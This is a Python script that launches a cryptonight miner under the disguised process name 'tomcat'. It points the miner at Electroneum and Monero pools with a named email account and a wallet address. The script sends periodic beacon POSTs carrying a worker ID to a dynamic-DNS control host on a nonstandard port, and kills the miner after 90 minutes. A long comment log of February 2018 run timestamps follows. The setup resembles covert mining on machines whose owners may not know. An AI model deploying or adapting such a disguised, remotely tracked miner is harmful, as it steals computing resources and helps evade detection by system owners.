import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:42:01.772959
#2018-02-17 17:29:07.461399
#2018-02-17 19:18:04.229118
#2018-02-17 21:09:05.478094
#2018-02-17 22:53:04.379810
#2018-02-18 00:38:06.054091
#2018-02-18 02:29:01.510988
#2018-02-18 04:16:01.842292
#2018-02-18 06:06:01.648667
#2018-02-18 07:55:08.705262
#2018-02-18 09:42:04.056007
#2018-02-18 11:27:06.981085
#2018-02-18 13:13:04.322009
#2018-02-18 15:02:04.066604
#2018-02-18 16:50:08.319472
#2018-02-18 18:37:07.098047
#2018-02-18 20:25:04.413028
#2018-02-18 22:11:03.558985
#2018-02-18 23:59:05.129200
#2018-02-19 01:32:01.672781
#2018-02-19 03:08:02.096146
#2018-02-19 04:39:03.522149
#2018-02-19 06:11:07.785678
#2018-02-19 07:47:07.579310
#2018-02-19 09:22:02.204896
#2018-02-19 10:52:08.349112
#2018-02-19 12:24:08.255199
#2018-02-19 13:57:06.730027
#2018-02-19 15:33:01.764893
#2018-02-19 17:05:11.671191
#2018-02-19 18:39:06.456959
#2018-02-19 20:12:05.842343
#2018-02-19 21:48:05.571387
#2018-02-19 23:20:08.250237
#2018-02-20 00:51:03.741708
#2018-02-20 02:32:06.394511
#2018-02-20 04:06:07.702601
#2018-02-20 05:34:07.378937
#2018-02-20 07:07:06.926589
#2018-02-20 08:43:06.471097
#2018-02-20 10:13:07.123457
#2018-02-20 11:45:10.657518
#2018-02-20 13:21:10.266546
#2018-02-20 14:52:01.897218
#2018-02-20 16:26:01.399977
#2018-02-20 17:59:14.612839
#2018-02-20 19:38:08.571100
#2018-02-20 21:12:01.891814
#2018-02-20 22:41:01.934448
#2018-02-21 00:11:01.876472
#2018-02-21 01:49:04.866191
#2018-02-21 03:26:02.199064
#2018-02-21 04:59:07.130204
#2018-02-21 06:31:01.297280
#2018-02-21 08:05:09.814200
#2018-02-21 09:39:01.568222
#2018-02-21 11:15:11.243456
#2018-02-21 12:47:08.203332
#2018-02-21 14:20:12.379722
#2018-02-21 15:54:06.184643
#2018-02-21 17:33:08.180641
#2018-02-21 19:02:06.181145
#2018-02-21 20:38:06.922614
#2018-02-21 22:18:07.543375
#2018-02-21 23:52:07.835377
#2018-02-22 01:26:04.954011
#2018-02-22 03:02:05.406185
#2018-02-22 04:32:04.100982
#2018-02-22 06:04:03.907937
#2018-02-22 07:37:04.361688
#2018-02-22 09:12:04.038960
#2018-02-22 10:46:09.336391
#2018-02-22 12:16:05.314376
#2018-02-22 13:50:02.717838
#2018-02-22 15:27:07.096011
#2018-02-22 16:55:10.968566
#2018-02-22 18:29:05.585528
#2018-02-22 20:09:04.337366
#2018-02-22 21:41:05.581793
#2018-02-22 23:13:07.782418
#2018-02-23 00:48:01.604944
#2018-02-23 02:21:08.002691
#2018-02-23 03:57:04.684930
#2018-02-23 05:41:07.393363
#2018-02-23 07:26:04.430337
#2018-02-23 09:30:10.548624
#2018-02-23 11:36:07.760652
#2018-02-23 13:25:10.142458
#2018-02-23 15:12:07.533280
#2018-02-23 17:00:10.911069
#2018-02-23 18:47:05.060891
#2018-02-23 20:34:04.319652
#2018-02-23 22:20:06.910341
#2018-02-24 00:05:08.067659
#2018-02-24 01:57:04.358003
#2018-02-24 03:48:02.032076
#2018-02-24 05:34:07.005382
#2018-02-24 07:20:08.218090
#2018-02-24 09:10:04.169430
#2018-02-24 11:06:04.803244
#2018-02-24 12:54:02.068830
#2018-02-24 14:42:05.372990
#2018-02-24 16:33:07.104028
#2018-02-24 18:23:01.803432
#2018-02-24 20:09:06.089695
#2018-02-24 21:53:05.856975
#2018-02-25 00:54:05.455322
#2018-02-25 04:44:05.355705
#2018-02-25 08:53:01.531739